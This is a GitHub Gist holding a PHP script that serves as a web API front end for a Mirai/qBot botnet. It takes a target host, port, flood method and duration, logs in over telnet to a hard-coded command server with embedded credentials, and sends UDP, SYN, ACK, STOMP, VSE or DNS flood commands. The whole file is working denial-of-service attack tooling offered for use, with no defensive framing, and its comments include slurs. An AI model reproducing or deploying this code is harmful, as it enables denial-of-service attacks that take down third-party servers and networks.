Created
November 1, 2019 13:19
-
-
Save heylastway/f9b1b2d5b2cdc0cf6127132b214f2bdd to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| error_reporting(E_ALL); | |
| /* | |
| * * * * * * | |
| * ORIGINAL CODER: | |
| * qBot/Gayfgt Botnet API by BadLuckJosh | |
| * Twitter: @BadLuckJoshh - @0x424C4A | |
| * HF UID: 2769414 | |
| * Usage: http://site.com/api.php?key=[key]&host=[host]&port=[port]&method=[method]&time=[time] | |
| * * * * * * | |
| * MODIFIED VERSION FOR MIRAI USAGE BY Jester | |
| * HF UID: 2978478 | |
| * Twitter: @xJesterino | |
| * Instagram: thejesterino | |
| * * * * * * | |
| * KEEP THE "\r\n" ON THE END OF USERNAME/PASSWORD AND COMMANDS! | |
| * * * * * * | |
| */ | |
| // API Keys | |
| $APIKeys = array("EnterYourKeysHere", "AddMoreLikeThis"); | |
| // VALID attack methods | |
| $attackMethods = array("RAWUDP", "ACK", "STOMP", "DNS", "VSE", "SYN"); | |
| // I'm so gay | |
| function htmlsc($string) | |
| { | |
| return htmlspecialchars($string, ENT_QUOTES, "UTF-8"); | |
| } | |
| // Check if all parameters are passed | |
| if (!isset($_GET["key"]) || !isset($_GET["host"]) || !isset($_GET["port"]) || !isset($_GET["method"]) || !isset($_GET["time"])) | |
| die("You are missing a parameter"); | |
| // Variables for attack | |
| $key = htmlsc($_GET["key"]); | |
| $host = htmlsc($_GET["host"]); | |
| $port = htmlsc($_GET["port"]); | |
| $method = htmlsc(strtoupper($_GET["method"])); | |
| $time = htmlsc($_GET["time"]); | |
| $command = ""; | |
| // Check if API key is valid | |
| if (!in_array($key, $APIKeys)) die("Invalid API key"); | |
| // Check if attack method is valid | |
| if (!in_array($method, $attackMethods)) die("Invalid attack method"); | |
| // Set command for method (should really use a switch() statement but who cares?) | |
| if ($method == "RAWUDP") $command = "udpplain $host $time len=65500 rand=1 dport=$port\r\n"; | |
| else if ($method == "DNS") $command = "dns $host $time dport=$port domain=$host\r\n"; | |
| else if ($method == "SYN") $command = "syn $host $time dport=$port\r\n"; | |
| else if ($method == "ACK") $command = "ack $host $time dport=$port\r\n"; | |
| else if ($method == "STOMP") $command = "stomp $host $time dport=$port\r\n"; | |
| else if ($method == "VSE") $command = "vse $host $time dport=$port\r\n"; | |
| // Add other methods if you need them, I'm sure you're capable of doing that (I hope) | |
| // Connect | |
| $socket = fsockopen("163.172.191.95", "23"); // Example: $socket = fsockopen("1.2.3.4", "23"); | |
| ($socket ? null : die("Failed to connect")); | |
| // Login | |
| fwrite($socket, " \r\n"); // Leave This. | |
| sleep(3); | |
| fwrite($socket, "13\r\n"); // Username | |
| sleep(3); | |
| fwrite($socket, "root\r\n"); // Password | |
| // Send command | |
| sleep(9); // Why? I've noticed for some people it doesn't work w/o the sleep() (or anything before fwrite()ing $command)! | |
| fwrite($socket, $command); | |
| // Close connection | |
| fclose($socket); | |
| // Say the attack has been sent | |
| echo "Attack sent to $host:$port for $time seconds using method $method!\n"; | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment